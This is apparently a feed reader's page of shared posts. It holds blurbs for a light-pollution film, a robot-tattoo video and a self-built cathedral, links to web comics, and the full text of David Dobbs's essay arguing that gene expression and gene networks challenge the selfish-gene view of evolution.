Shared posts

15 Aug 00:05

Lost in Light

Lost in Light, a short film on how light pollution affects the view of the night skies. Shot mostly in California, the movie shows how the view gets progressively better as you move away from the lights. Finding locations to shoot at every level of light pollution was a challenge and getting to the darkest skies with no light pollution was a journey in itself. Here’s why I think we should care more.

The night skies remind us of our place in the Universe. Imagine if we lived under skies full of stars. That reminder we are a tiny part of this cosmos, the awe and a special connection with this remarkable world would make us much better beings - more thoughtful, inquisitive, empathetic, kind and caring. Imagine kids growing up passionate about astronomy looking for answers and how advanced humankind would be, how connected and caring we’d feel with one another, how noble and adventurous we’d be. How compassionate with fellow species on Earth and how one with Nature we’d feel. Imagine a world where happiness of the soul is more beautiful. Ah, I feel so close to inner peace. I can only wonder how my and millions of other lives would have changed.

But in reality, most of us live under heavily light polluted skies and some have never even seen the Milky Way. We take the skies for granted and are rather lost in our busy lives without much care for the view of the stars.

How does light pollution affect the night skies and quite possibly our lives?

For licensing inquiries - sriramnitt.pm@gmail.com
Website - srirammurali.com
Instagram - instagram.com/sriram_murali
Music - A Thousand Years by David A. Molina (musicbed.com)

To order prints - pramfotos.com

Copyright © All Rights Reserved

Cast: Sriram Murali

01 Sep 17:38

Cognitive bias cheat sheet

by Buster Benson

Because thinking is hard.

Continue reading on Better Humans »

12 Sep 00:00

Earth Temperature Timeline

[After setting your car on fire] Listen, your car's temperature has changed before.

05 Sep 18:01

Do we have a back-up in the audience?

by CommitStrip

10 Aug 07:28

Comic: God Tier

by Tycho@penny-arcade.com (Tycho)

20 Jul 05:41

World's First Tattoo by Industrial Robot

For more information about Pierre and Johan visit:
appropriateaudiences.net
appropriateaudiences.tumblr.com
instagram.com/appropriate_audiences

For more information about Autodesk's Pier 9 Artist in Residence Program:
autodesk.com/air

Director & Editor - Charlie Nordstrom (northstreamfilm.com)
Cameras - Blue Bergen, Charlie Nordstrom, Sebastian Morales Prado
Archive Footage - Renaud Skyronka & Louis Pille Schneider

Music:

"Erotic Robotics"
by The Polish Ambassador

"Yellows & Browns"
by Koen Park

Available on Free Music Archive - freemusicarchive.org
Under CC by license - Attribution Noncommercial 4.0 International

Cast: Pier 9, Charlie Nordstrom, Blue Bergen, appropriate audiences and Sebastian Morales

25 Aug 16:05

A very comprehensive and precise spec

by CommitStrip


23 Aug 19:41

When you can’t not listen.

by CommitStrip


07 Jul 19:44

The sad generation that is being convinced it doesn't know how to love

by Laura Pires

I can't take this talk of liquid love anymore

Continue reading on TRENDR »

12 Jul 12:38

The Lone Man Building a Cathedral By Hand

For 53 years, Justo Gallego has been building a cathedral by hand on the outskirts of Madrid almost entirely by himself. Gallego has no formal architecture or construction training, but that hasn't stopped him from toiling on this herculean task. At 90 years old, Gallego knows that he will not be able to finish the project in his lifetime. But he keeps at it anyway, day after day, driven by his faith.

Cast: Great Big Story

11 Jul 17:35

A bad workman blames his tools

by CommitStrip


08 Jul 00:00

Gnome Ann

President Andrew Johnson once said, "If I am to be shot at, I want Gnome Ann to be in the way of the bullet."

04 Jul 21:38

Die, selfish gene, die

by David Dobbs

For decades, the selfish gene metaphor let us view evolution with new clarity. Is it now blinding us?

A couple of years ago, at a massive conference of neuroscientists — 35,000 attendees, scores of sessions going at any given time — I wandered into a talk that I thought would be about consciousness but proved (wrong room) to be about grasshoppers and locusts. At the front of the room, a bug-obsessed neuroscientist named Steve Rogers was describing these two creatures — one elegant, modest, and well-mannered, the other a soccer hooligan.

The grasshopper, he noted, sports long legs and wings, walks low and slow, and dines discreetly in solitude. The locust scurries hurriedly and hoggishly on short, crooked legs and joins hungrily with others to form swarms that darken the sky and descend to chew the farmer’s fields bare.

Related, yes, just as grasshoppers and crickets are. But even someone as insect-ignorant as I could see that the hopper and the locust were radically different animals — different species, doubtless, possibly different genera. So I was quite amazed when Rogers told us that grasshopper and locust are in fact the same species, even the same animal, and that, as Jekyll is Hyde, one can morph into the other at alarmingly short notice.

Not all grasshopper species, he explained (there are some 11,000), possess this morphing power; some always remain grasshoppers. But every locust was, and technically still is, a grasshopper — not a different species or subspecies, but a sort of hopper gone mad. If faced with clues that food might be scarce, such as hunger or crowding, certain grasshopper species can transform within days or even hours from their solitudinous hopper states to become part of a maniacally social locust scourge. They can also return quickly to their original form.

In the most infamous species, Schistocerca gregaria, the desert locust of Africa, the Middle East and Asia, these phase changes (as this morphing process is called) occur when crowding spurs a temporary spike in serotonin levels, which causes changes in gene expression so widespread and powerful they alter not just the hopper’s behaviour but its appearance and form. Legs and wings shrink. Subtle camo colouring turns conspicuously garish. The brain grows to manage the animal’s newly complicated social world, which includes the fact that, if a locust moves too slowly amid its million cousins, the cousins directly behind might eat it.

How does this happen? Does something happen to their genes? Yes, but — and here was the point of Rogers’s talk — their genes don’t actually change. That is, they don’t mutate or in any way alter the genetic sequence or DNA. Nothing gets rewritten. Instead, this bug’s DNA — the genetic book with millions of letters that form the instructions for building and operating a grasshopper — gets reread so that the very same book becomes the instructions for operating a locust. Even as one animal becomes the other, as Jekyll becomes Hyde, its genome stays unchanged. Same genome, same individual, but, I think we can all agree, quite a different beast.

Why?

Transforming the hopper is gene expression — a change in how the hopper’s genes are ‘expressed’, or read out. Gene expression is what makes a gene meaningful, and it’s vital for distinguishing one species from another. We humans, for instance, share more than half our genomes with flatworms; about 60 per cent with fruit flies and chickens; 80 per cent with cows; and 99 per cent with chimps. Those genetic distinctions aren’t enough to create all our differences from those animals — what biologists call our particular phenotype, which is essentially the recognisable thing a genotype builds. This means that we are human, rather than wormlike, flylike, chickenlike, feline, bovine, or excessively simian, less because we carry different genes from those other species than because our cells read differently our remarkably similar genomes as we develop from zygote to adult. The writing varies — but hardly as much as the reading.

This raises a question: if merely reading a genome differently can change organisms so wildly, why bother rewriting the genome to evolve? How vital, really, are actual changes in the genetic code? Do we always need DNA changes to adapt to new environments? Are there other ways to get the job done? Is the importance of the gene as the driver of evolution being overplayed?

You’ve probably noticed that these questions are not gracing the cover of Time or haunting Oprah, Letterman, or even TED talks. Yet for more than two decades they have been stirring a heated argument among geneticists and other evolutionary theorists. As evidence of the power of rapid gene expression and other complex genomic dynamics mounts, these questions might (or might not, for pesky reasons we’ll get to) begin to change not only mainstream evolutionary theory but our more everyday understanding of evolution.

Twenty years ago, phase changes such as those that turn grasshopper to locust were relatively unknown, and, outside of botany anyway, rarely viewed as changes in gene expression. Now, notes Mary Jane West-Eberhard, a wasp researcher at the Smithsonian Tropical Research Institute in Panama, sharp phenotype changes due to gene expression are ‘everywhere’. They show up in gene-expression studies of plants, microbes, fish, wasps, bees, birds, and even people. The genome is continually surprising biologists with how fast and fluidly it can change gene expression — and thus phenotype.

These discoveries closely follow the recognition, during the 1980s, that gene-expression changes during very early development — such as in embryos or sprouting plant seeds — help to create differences between species. At around the same time, genome sequencing began to reveal the startling overlaps mentioned above between the genomes of starkly different creatures. (To repeat: you are 80 per cent cow.)

Shapeshifter: the locust. Photo by Ocean/Corbis

Gregory Wray, a biologist at Duke University in North Carolina who studies fruit flies, sees this flexibility of genomic interpretation as a short path to adaptive flexibility. When one game plan written in the book can’t provide enough flexibility, fast changes in gene expression — a change in the book’s reading — can provide another plan that better matches the prevailing environment.

‘Different groups of animals succeed for different reasons,’ says Wray. ‘Primates, including humans, have succeeded because they’re especially flexible. You could even say flexibility is the essence of being a primate.’

According to Wray, West-Eberhard and many others, this recognition of gene expression’s power, along with other dynamics and processes unanticipated by mainstream genetic theory through the middle of last century, requires that we rethink and expand the way we view genes and evolution. For a century, the primary account of evolution has emphasised the gene’s role as architect: a gene (or gene variant) creates a trait that either proves advantageous or not, and is thus selected for, changing a species for the better, or not. Thus, a genetic blueprint creates traits and drives evolution.

This gene-centric view, as it is known, is the one you learnt in high school. It’s the one you hear or read of in almost every popular account of how genes create traits and drive evolution. It comes from Gregor Mendel and the work he did with peas in the 1860s. Since then, and especially over the past 50 years, this notion has assumed the weight, solidity, and rootedness of an immovable object.

But a number of biologists argue that we need to replace this gene-centric view with one that more heavily emphasises the role of more fluid, environmentally dependent factors such as gene expression and intra-genome complexity — that we need to see the gene less as an architect and more as a member of a collaborative remodelling and maintenance crew.


They ask for something like the rejection a century ago of the Victorian-era ‘Great Man’ model of history. This revolt among historians recast leaders not as masters of history, as Tolstoy put it, but as servants. Thus the Russian Revolution exploded not because Marx and Lenin were so clever, but because fed-up peasants created an impatience and an agenda that Marx articulated and Lenin ultimately hijacked. Likewise, D-Day succeeded not because Eisenhower was brilliant but because US and British soldiers repeatedly improvised their way out of disastrously fluid situations. Wray, West-Eberhard and company want to depose genes likewise. They want to cast genes not as the instigators of change, but as agents that institutionalise change rising from more dispersed and fluid forces.

This matters like hell to people like West-Eberhard and Wray. Need it concern the rest of us?

It should. We are rapidly entering a genomic age. A couple of years ago, for instance, I became one of what is now almost a half-million 23andMe customers, paying the genetic-profiling company to identify hundreds of genetic variants that I carry. I now know ‘genes of interest’ that reveal my ancestry and help determine my health. Do I know how to make sense of them? Do they even make sense? Sometimes; sometimes not. They tell me, for instance, that I’m slightly more likely than most to develop Alzheimer’s disease, which allows me to manage my health accordingly. But those genes also tell me I should expect to be short and bald, when in fact I’m 6’3” with a good head of hair.

Soon, it will be practical to buy my entire genome. Will it tell me more? Will it make sense? Millions of people will face this puzzle. Along with our doctors, we’ll draw on this information to decide everything from what drugs to take to whether to have kids, including kids a few days past conception — a true make-or-break decision.

Yet we enter this genomic age with a view of genetics that, were we to apply it, say, to basketball, would reduce that complicated team sport to a game of one-on-one. A view like that can be worse than no view. It tempts you to think you understand the game when you don’t. We need something more complex.

‘And it’s not as if people can’t handle things more complex,’ says Wray. ‘Educated people handle ideas more complex than this all the time. We have a more complicated understanding of football than we do genetics and evolution. Nobody thinks just the quarterback wins the game.

‘We’re stuck in an outmoded way of thinking that should have fallen long ago.’

This outmoded thinking grew from seeds planted 150 years ago by Gregor Mendel, the monk who studied peas. Mendel spent seven years breeding peas in a five-acre monastery garden in the town of Brno, now part of the Czech Republic. He crossed plants bearing wrinkled peas with those bearing smooth peas, producing 29,000 plants altogether. When he was done and he had run the numbers, he had exposed the gene.


Mendel didn’t expose the physical gene, of course (that would come a century later), but the conceptual gene. And this conceptual gene, revealed in the tables and calculations of this math-friendly monk, seemed an agent of mathematical neatness. Mendel’s thousands of crossings showed that the traits he studied — smooth skin versus wrinkled, for instance, or purple flower versus white — appeared or disappeared in consistent ratios dictated by clear mathematical formulas. Inheritance appeared to work like algebra. Anything so math-friendly had to be driven by discrete integers.

It was beautiful work. Yet when Mendel first published his findings in 1866, just seven years after Charles Darwin’s On the Origin of Species, no one noticed. Starting in 1900, however, biologists rediscovering his work began to see that these units of heredity he’d discovered — dubbed genes in 1909 — filled a crucial gap in Darwin’s theory of evolution. This recognition was the Holy Shit! moment that launched genetics’ Holy Shit! century. It seemed to explain everything. And it saved Darwin.

Darwin had legitimised evolution by proposing for it a viable mechanism — natural selection, in which organisms with the most favourable traits survive and multiply at higher rates than do others. But he could not explain what created or altered traits.

Mendel could. Genes created traits, and both would spread through a population if a gene created a trait that survived selection.

That much was clear by 1935. Naturally, some kinks remained, but more math-friendly biologists soon straightened those out. This took most of the middle part of the 20th century. Biologists now call this decades-long project the modern evolutionary synthesis. And it was all about maths.

The first vital calculations were run in the 1930s, when Ronald Fisher, J B S Haldane and Sewall Wright, two Brits and an American working more or less separately, worked out how Mendel’s rather binary genetic model could create not just binary differences such as smooth versus wrinkled peas but the gradual evolutionary change of the sort that Darwin described. Fisher, Haldane and Wright, working the complicated maths of how multiple genes interacted through time in a large population, showed that significant evolutionary change often revealed itself as many small changes yielded a large effect, just as a series of small nested equations within a long algebra equation could.

The second kink was tougher. If organisms prospered by out-competing others, why did humans and some other animals help one another? This might seem a non-mathy problem. Yet in the 1960s, British biologist William Hamilton and American geneticist George Price, who was working in London at the time, solved it too with maths, devising formulas quantifying precisely how altruism could be selected for. Some animals act generously, they explained, because doing so can aid others, such as their children, parents, siblings, cousins, grandchildren, or tribal mates, who share or might share some of their genes. The closer the kin, the kinder the behaviour. Thus, as Haldane once allegedly quipped, ‘I would lay down my life for two brothers or eight cousins.’

Thus maths reconciled Mendel and Darwin and made modern genetics and evolutionary theory a coherent whole. Watson and Crick’s 1953 discovery of the structure of DNA simply iced the cake: now we knew the structure that performed the maths.

Finally, also in the 1960s, Hamilton and American George Williams upped the ante on the gene’s primacy. With fancy maths, they argued that we should view any organism, including any human, as merely a sort of courier for genes and their traits. This flipped the usual thinking. It made the gene vital and the organism expendable. Our genes did not exist for us. We existed for them. We served only to carry these chemical codes forward through time, like those messengers in old sword-and-sandal war movies who run non-stop for days to deliver data and then drop dead. A radical idea. Yet it merely extended the logic of kin selection, in which any gene-courier — say, a mom watching her children’s canoe overturn — would risk her life to let her kin carry forth her DNA.

This notion of the gene as the unit selected, and the organism as a kludged-up cart for carrying it through time, placed the gene smack at the centre of things. It granted the gene something like agency.

At first, not even many academics paid this any heed. This might be partly because people resist seeing themselves as donkey carts. Another reason was that neither Hamilton nor Williams was a masterly communicator.

But 15 years after Hamilton and Williams kited this idea, it was embraced and polished into gleaming form by one of the best communicators science has ever produced: the biologist Richard Dawkins. In his magnificent book The Selfish Gene (1976), Dawkins gathered all the threads of the modern synthesis — Mendel, Fisher, Haldane, Wright, Watson, Crick, Hamilton, and Williams — into a single shimmering magic carpet.

These days, Dawkins makes the news so often for things like pointing out that a single college in Cambridge has won more Nobel Prizes than the entire Muslim world, that some might wonder how he ever became so celebrated. The Selfish Gene is how. To read The Selfish Gene is to be amazed, entertained, transported. For instance, when Dawkins describes how life might have begun — how a randomly generated strand of chemicals pulled from the ether could happen to become a ‘replicator’, a little machine that starts to build other strands like itself, and then generates organisms to carry it — he creates one of the most thrilling stretches of explanatory writing ever penned. It’s breathtaking.


Dawkins assembles genetics’ dry materials and abstract maths into a rich but orderly landscape through which he guides you with grace, charm, urbanity, and humour. He replicates in prose the process he describes. He gives agency to chemical chains, logic to confounding behaviour. He takes an impossibly complex idea and makes it almost impossible to misunderstand. He reveals the gene as not just the centre of the cell but the centre of all life, agency, and behaviour. By the time you’ve finished his book, or well before that, Dawkins has made of the tiny gene — this replicator, this strip of chemicals little more than an abstraction — a huge, relentlessly turning gearwheel of steel, its teeth driving smaller cogs to make all of life happen.

It’s a gorgeous story. Along with its beauty and other advantageous traits, it is amenable to maths and, at its core, wonderfully simple. It has inspired countless biologists and geneticists to plumb the gene’s wonders and do brilliant work. Unfortunately, say Wray, West-Eberhard and many others, the selfish-gene story is so focused on the gene’s singular role in natural selection that in an age when it’s ever more clear that evolution works in ways far more clever and complex than we realise, the selfish-gene model increasingly impoverishes both scientific and popular views of genetics and evolution. As both conceptual framework and metaphor, the selfish-gene has helped us see the gene as it revealed itself over the 20th century. But as a new age and new tools reveal a more complicated genome, the selfish-gene is blinding us.

For over two decades, Wray, West-Eberhard and other evolutionary theorists — such as Massimo Pigliucci, professor of philosophy at the City University of New York; Eva Jablonka, a geneticist and historian of science at Tel Aviv University, London; Stuart Kauffman, professor of biochemistry and mathematics at the University of Vermont; Stuart A Newman, professor of cell biology and anatomy at the New York Medical College; and the late Stephen Jay Gould, to name a few — have been calling for an ‘extended modern synthesis’ to replace the gene-centric view of evolution with something richer. They do so even though they agree with most of what Dawkins says a gene does. They agree, in essence, that the gene is a big cog, but would argue that the biggest cog doesn’t necessarily always drive the other cogs. In many cases, the other cogs drive the gene. The gene, in short, just happens to be the biggest, most obvious part of the trait-making inheritance and evolutionary machine. But not the driver.

Another way to put it: Mendel stumbled over the wrong chunk of gold.

Mendel ran experiments that happened to reveal strong single-gene dynamics whose effects — flower colour, skin texture — can seem far more significant than they really are. Many plant experiments since then, for instance, have shown that environmental factors such as temperature changes can spur gene-expression changes that alter a plant far more than Mendel’s gene variants do. As with grasshoppers, a new environment can quickly turn a plant into something almost unrecognisable from its original form. If Mendel had owned an RNA sequencing machine and was in the habit of tracking gene expression changes, he might have spotted these. But sequencers didn’t exist, so he crossed plants instead, and saw just one particularly obvious way that an organism can change.

The gene-centric view is thus ‘an artefact of history’, says Michael Eisen, an evolutionary biologist who researches fruit flies at the University of California, Berkeley. ‘It rose simply because it was easier to identify individual genes as something that shaped evolution. But that’s about opportunity and convenience rather than accuracy. People confuse the fact that we can more easily study it with the idea that it’s more important.’

The gene’s power to create traits, says Eisen, is just one of many evolutionary mechanisms. ‘Evolution is not even that simple. Anyone who’s worked on systems sees that natural selection takes advantage of the most bizarre aspects of biology. When something has so many parts, evolution will act on all of them.

‘It’s not that genes don’t sometimes drive evolutionary change. It’s that this mutational model — a gene changes, therefore the organism changes — is just one way to get the job done. Other ways may actually do more.’

Like what other ways? What significant and plausible evolutionary dynamics stand in tension with a single-gene-centred model? What gets obscured by the insistence that a ‘selfish gene’, a coherent, solitary replicator, is the irreducible and ever-present driver of evolution?

A shortlist of such dynamics would include some of the evolutionary dynamics being proposed by anthropologists, such as cultural transmission of knowledge and behaviour that allows social species ranging from bees to humans to adapt to changing environments without genetic alterations; and culture-gene evolution, a related idea, in which culture is not the ‘handmaiden’ of genes, but another source of transmissible adaptive information whose elements co-evolve with genes, each affecting the other.

Also in tension with the selfish-gene model are epigenetic changes suggested by recent research, such as methylation and other alterations to chemical wrappings around DNA, that can modulate DNA’s expression without changing its sequence. Such epigenetic changes may provide a way to pass heritable traits down through at least a few generations without changing any actual genes. To be sure, this research is still unproven as a significant evolutionary force. But while it is clearly important enough to pursue, many defenders of the selfish-gene model dismiss it out of hand.

Finally, the selfish-gene model is in tension with various ‘interesting evolutionary phenomena’, as Gregory Wray puts it in Evolution: The Extended Synthesis, ‘that are apparent only at the scale of hundreds or thousands of genes’ — a scale only made viewable during the past decade or so, as we’ve learnt to rapidly sequence entire genomes.

Of these genomic dynamics, perhaps the most challenging to the selfish-gene story are epistatic or gene-gene interactions. Epistasis refers to the fact that the presence of some genes (or their variants) can have profound and unpredictable influences on the activity and effects generated by other genes. To put it another way, a gene’s effect can vary wildly depending on which combination of other genes it finds itself with. (Think Jerry Garcia playing with different musical partners.)

Epistasis is hardly a new concept. In fact, geneticists have been arguing about its importance ever since R.A. Fisher and Sewall Wright bickered about it in the 1920s. Dawkins acknowledges a role for gene-gene interactions in The Selfish Gene, noting that ‘the effect of any one gene depends on interaction with many others.’ But research since then shows that these interactions take place in non-linear, non-additive ways of a complexity impossible to understand at the time Dawkins wrote his book. Casey Greene and Jason Moore of Dartmouth, for instance, recently found that in some cases epistatic interactions seem to warp conventional gene-trait relationships so profoundly that they can often negate the gene as a trait’s reliable carrier.

Individual bees morph from worker to guard to scout by gene expression alone, depending on the needs of the hive

This is not merely a matter of one gene muffling or amplifying another, though both these things happen. And it’s not a matter of additive effects, such as four ‘tall’ genes making you taller than would two. Rather, these multi-gene epistatic interactions can create endless possible combinations of mutual influence in which any given gene’s contribution seems to rise less from its inherent trait-making power than from what company that gene finds itself keeping. To draw on P.Z. Myers’ apt analogy, epistasis means that single genes often carry little more inherent significance than individual playing cards do in poker. In a poker hand, the significance and effect of a two of hearts — its ‘trait’ — depend so heavily on the other cards you’re holding that it’s almost meaningless to say the card has any replicable power on its own. It’s replicable in that it’s a two of hearts every time it’s dealt. But it can deliver the same effect in subsequent generations only if it’s dealt not just into the exact same handful of cards, but into a round in which all the other players at the table also hold the same cards as before — and happen to bet, hold, and fold in exactly the same way. Not something to count on.

And a two of hearts is a far more coherent thing than is a gene. One of the peskiest problems of leaning too heavily on a gene-centric model these days is that the definition of the word ‘gene’ gets ever more various and slippery.

Even as a technical term, the word carries at least a half-dozen meanings, and more are added as science finds new tools for exploring the genome. This alone makes it either a poor candidate for a popular meme — or, if you value flexibility over exactitude, perhaps a perfect one, since its meaning can be defended or reshaped or expanded to suit the occasion. If you expand the meaning to be ‘the thing essential to all true heredity and selection’, you can then give the gene primary credit for any discovered or proposed evolutionary force in which the gene seems to be involved — and reject outright any proposed evolutionary force that doesn’t seem to involve genes.

But the gene’s definition is not just semantically vague. As geneticists explore the genome’s previously uncharted stretches, they’re finding that a lot of the work conventionally attributed to ‘genes’ (in the sense of consistent, reasonably well defined clusters of DNA) appears to be done instead by networks of genes and strange DNA elements that doubly defy the selfish-gene model.

These regulatory networks challenge the selfish-gene model first because they include DNA elements not conventionally defined as genes. More important, some researchers believe these networks challenge the selfish-gene model because they often seem to behave not like selfish entities balancing their separate agendas, in selfish-gene style, but like managerial teams regulating the behaviour of individual genes for the interest of the organism. The chromosome’s three-dimensional nature brings those regulatory chunks into contact with individual genes in highly unpredictable ways. With each gene ‘surrounded by an ocean’ of such regulatory elements, as molecular biophysicist Joe Dekker told WIRED, each gene ‘can touch and interact with a whole collection of them’. Yale geneticist Mark Gerstein found that the genes in these networks sometimes seem to get selected for even if they don’t have important effects on their own. In other cases they seem to have effects but be exempt from selection pressure.

These regulatory elements now appear to grossly outnumber the actual genes, possibly by as much as 50 to 1. As Yale geneticist Mark Gerstein politely notes, the complexity of these regulatory networks, along with their ad hoc management-team nature, raises the question of what’s being selected: individual genes, as the selfish-gene model proposes, or the management team, by some process still hidden amid all this complexity. Others, such as Cold Spring Harbor geneticist Thomas Gingeras, question outright whether the transcript (the marching orders a gene issues to begin gene expression) should replace the gene as the genome’s functional unit. These issues are not merely academic; resolving them could help solve mysteries about cancer and other diseases.

Such dynamics have emerged only in the last decade or so, as researchers have been able to examine the genome more closely. Yet even though we so far ‘have only a dim idea of how all this works’, as Gregory Wray wrote in 2010, it ‘is clear … that these kinds of assumption-violating exceptions are not rare.’

Wray’s language here is crucial: he’s not saying these findings refute the details of the gene-centric model. He’s saying they violate the model’s assumptions.

And this is the crux of this entire dispute: The point is not whether the findings of a genomic age or of anthropology refute the selfish-gene model, invalidate its theoretical details, or debunk the modern synthesis. Mostly they don’t. The selfish-gene model is roomy enough to host many of these findings. It has shown an uncanny ability to do so. But as time passes it does so ever more uncomfortably, for both host and guests. Some findings or ideas must be almost forced in. Others get prematurely locked out.

The selfish-gene model and metaphor can probably be stretched even more to account for some of these things. But in an age when assumption-violating ideas from genomic studies, anthropology, and other fields are flourishing, does the selfish gene story remain the best way to account for them? Does it make sense to attach these proliferating findings and ideas on to the selfish-gene story as appendices? Or is it time to find another story? It may be that the gene is always a player. But it is rarely the only player. And — may I speak metaphorically? — it may (or may not) be that the gene always behaves as if it were selfish. But that doesn’t mean it always gets its way.

One of the assumption-violating exceptions Wray refers to is gene expression’s breadth of power. In the social wasps that Mary Jane West-Eberhard has been studying in Panama since 1979, many of the most important distinctions among a colony’s individuals rise not from differences in their genomes, which vary little, but from the plasticity born of gene expression. This starts with the queen, who is genetically identical to her thousands of sisters yet whose gene expression makes her not only larger, but singles her out as the colony’s reproductive unit. Likewise with most honeybees. In social honeybees, the differences between workers, guards, and scouts all arise from gene expression, not gene sequence. Individual bees morph from one form to another — worker to guard to scout — by gene expression alone, depending on the needs of the hive.

As described above, the questionable coherence of genes seems to apply especially to gene regulation — as do epistatic networks that further undermine the gene’s primacy. So while it’s clear that DNA plays a key role in regulating gene expression, it is not clear that all these ‘regulatory genes’ are the selfish genes of the Dawkins model.

This is but one reason why West-Eberhard, among others, has been long trying to cure the ‘cyclic amnesia’ that she says has ignored 150 years of evidence that the gene’s centrality is overplayed. West-Eberhard is a particularly articulate advocate. Yet she’s frustrated at how little she’s been able to change things.

As a David to Dawkins’s Goliath, West-Eberhard faces distinct challenges. For starters, she’s a she while Dawkins is a he, which should not matter but does. And while Dawkins holds forth from Oxford, one of the most prestigious universities on earth, and deploys from London an entire foundation in his name, West-Eberhard studies and writes from a remote outpost in Central America. Dawkins commands locust-sized audiences any time he speaks and probably turns down enough speaking engagements to fill five calendars; West-Eberhard speaks mainly to insect-crazed colleagues at small conferences. Dawkins wrote a delicious 300-page book that has sold tens of millions of copies; West-Eberhard has written a bunch of fine obscure papers and an 800-page tome, Developmental Plasticity and Evolution (2003), which, though not without its sweet parts, is generally consumed as a meal of obligation.

She does have her pithy moments. There are times, she says, when ‘the gene does not lead. It follows.’

Massimo Pigliucci and Gerd Muller use the same language in Evolution: The Extended Synthesis. By ‘the gene follows’, they mean that in complex organisms particularly, dynamics other than gene alterations, ranging from gene expression to complex gene regulation to developmental pathways formed by culture, can create heritable adaptations that either remain on their own or later become ‘fixed’ or locked in by genes.

One way in which the gene follows is through genetic assimilation — a clunky term for a graceful process. This can look Lamarckian, but it is not. It’s the development of a heritable change through flexible gene-expression responses that later get ‘fixed,’ or locked in, by a change in genotype. It takes a moment to explain. But let’s give it a run.

Genetic assimilation involves a three-step process.

First, an organism adapts to a changing environment by altering its gene expression to change its phenotype — its form or behaviour. Second, a gene emerges that locks in that phenotypic change. Finally, the gene spreads through the population.

For example, suppose you’re a predator. You live with others of your ilk in dense forest. Your kind hunts by stealth: you hide among trees, then jump out and snag your meat. You needn’t be fast, just sneaky and quick off the mark.


Then a big event — maybe a forest fire, or a plague that kills all your normal prey — forces you into a new environment. This new place is more open, which nixes your jump-and-grab tactic, but contains juicy little wild pigs that you can outrun if you sprint really hard. You start running down these critters. As you do, certain genes ramp up expression to build more muscle and fire the muscles more quickly. You get faster. You’re becoming a different animal.

You mate with another hunter. Your kids grow up to hunt with you. Since they hunt and practice hunting from early on, they too become fast — maybe faster than you, since they started younger. They didn’t inherit your speed in any Lamarckian way. Rather, like you, they simply developed it through gene expression driven by running so much. The same thing happens with their children: they run early, so they’re fast. Their speed is environmentally dependent. Your descendants keep this greater speed (greater, that is, than your ancestors’) for as long as they’re running down little pigs. The hunt makes them faster. But if they could get meals without sprinting, their speed would fade.

Now comes the second step: Several generations down the line, a beneficial mutation occurs in one of your descendants. Most mutations are neutral and many are bad. But this one’s good: It creates faster muscle fibres that let this descendant of yours — let’s call her Diana — easily run faster than her fastest siblings and cousins ever could. She flies.

Finally comes the third step: Diana’s children inherit the gene, as do some of theirs, and because their speed wows their mating prospects, Diana’s descendants mate early and often, bearing many kids. Thus this runner’s gene spreads through the generations until it becomes fixed in the population.

Now the thing is complete. An adaptive trait you originally developed through gene expression alone is made more permanent in your descendants by a new gene. Had the gene showed up back when you lived in the forest and speed didn’t mean anything, it would have given no advantage, and instead of being selected for, that speed gene would have disappeared or remained present but uncommon. But because hunting gave the gene value, the population took it in and spread it wide. The gene didn’t drive the train; it hopped aboard.

This isn’t the gene-centric world in which genotype creates phenotype. It’s a phenotype accommodating a new genotype by making it valuable.

Genetic assimilation was recognised as a possibility in the 1940s, but as Massimo Pigliucci and Courtney Murren put it, it was ‘attacked as of minor importance during the ‘hardening’ of the neo-Darwinian synthesis and … relegated to a secondary role for decades’. Interest has surged lately as gene expression becomes more apparent, and biologists are starting to spot the process in the field. No one proposes that genetic assimilation happens all the time or even commonly, or that it widely replaces conventional gene-driven evolution. But its existence suggests how gene expression’s fluidity can combine with conventional genetic dynamics to broaden evolution’s reach.

Gene Robinson, an entomologist who studies honeybees at the University of Illinois, says genetic assimilation could well have helped to create African honeybees, the ‘killer bee’ subspecies that is genetically distinct from the sweeter European honeybees that most beekeepers keep. Honeybee hives in certain parts of Africa, he says, were and are raided by predators more often than hives elsewhere, so their inhabitants had to react more sharply to attacks. This encouraged gene-expression changes that made the African bees respond more aggressively to threat. When new genes showed up that reinforced this aggression, those genes would have been selected for and spread through the population. This, Robinson says, is quite likely how African bees became genetically distinct from their European honeybee cousins. And they’d have been led there not by a gene, but by gene expression.

After several weeks of reading and talking to this phenotypic plasticity crowd, I phoned Richard Dawkins to see what he thought of all this. Did genes follow rather than lead? I asked him specifically about whether processes such as gene assimilation might lead instead. He said that genetic assimilation doesn’t really change anything, because since the gene ends up locking in the change and carrying it forward, it all comes back to the gene anyway.

‘This doesn’t modify the gene-centric model at all,’ he said. ‘The gene-centric model is all about the gene being the unit in the hierarchy of life that is selected. That remains the gene.’

‘He’s backfilling,’ said West-Eberhard. ‘He and others have long been arguing for the primacy of an individual gene that creates a trait that either survives or doesn’t.’

Yet West-Eberhard understands why many biologists stick to the gene-centric model. ‘It makes it easier to explain evolution,’ she says. ‘I’ve seen people who work in gene expression who understand all of this. But when they get asked about evolution, they go straight to Mendel. Because people understand it more easily.’ It’s easy to see why: even though life is a zillion bits of biology repeatedly rearranging themselves in a webwork of constantly modulated feedback loops, the selfish-gene model offers a step-by-step account as neat as a three-step flow chart. Gene, trait, phenotype, done.

In other words, the gene-centric model survives because simplicity is a hugely advantageous trait for an idea to possess. People will select a simple idea over a complex idea almost every time. This holds especially in a hostile environment, like, say, a sceptical crowd. For example, Sean B Carroll, professor of molecular biology and genetics at the University of Wisconsin, spends much of his time studying gene expression, but usually uses gene-centric explanations, because when talking to the public, he finds a simple story is a damned good thing to have.

Which drives West-Eberhard nuts.

‘Dawkins understands very well that gene expression is powerful,’ she says. ‘He sees things are more complex than a selfish gene. He could turn on its head the whole language.’

Yet Dawkins, and with him much of pop science, sticks to the selfish gene. The gene explains all. So far it has worked. The extended synthesis crowd has published scores of papers, quite a few books, and held meetings galore. They have changed the way many biologists think about evolution. But they have scarcely touched the public’s understanding. And they have not found a way to displace a meme so powerful as the selfish gene.

This meme, methinks, forms the true bone of contention and the true obstacle to progress. It’s one of the odd beauties of this whole mess that Dawkins himself coined the term meme, and did so in The Selfish Gene. He defined it as a big idea that competes for dominance in a tough environment — an idea that, like a catchy tune or a good joke, ‘propagates itself by leaping from brain to brain’. The selfish-gene meme has done just that. It has made of evolutionary theory a vehicle for its replication. The selfish gene has become a selfish meme.

If you’re West-Eberhard or of like mind, what are you to replace it with? The slave-ish gene? Not likely to leap from brain to brain. The co-operative gene? Dawkins himself considered this but rejected it and I agree that it lacks sufficient bling. And as West-Eberhard notes, any phrase with ‘gene’ in it still encourages a focus on single genes. And ‘evolution is not about single genes,’ she says. ‘It’s about genes working together.’

